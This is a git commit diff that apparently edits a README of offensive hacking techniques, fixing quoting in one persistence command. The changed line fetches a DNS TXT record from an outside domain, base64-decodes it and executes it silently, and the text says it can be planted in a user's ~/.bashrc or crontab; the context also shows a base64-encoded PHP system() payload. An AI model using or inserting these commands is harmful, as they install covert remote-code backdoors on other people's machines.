Update README.md

This commit is contained in:
skyper
2025-02-21 09:06:57 +00:00
committed by GitHub
parent c378c2018a
commit f347fe887f
+1 -1
View File
@@ -1851,7 +1851,7 @@ echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0
Can also be triggered via `~/.bashrc` or the user's crontab. Use (example):
```shell
# Use a "double bash" to redirect _also_ $()-subshell error to /dev/null:
bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \"\ |base64 -d);}"'&>/dev/null
bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null
```
<a id="ld-backdoor"></a>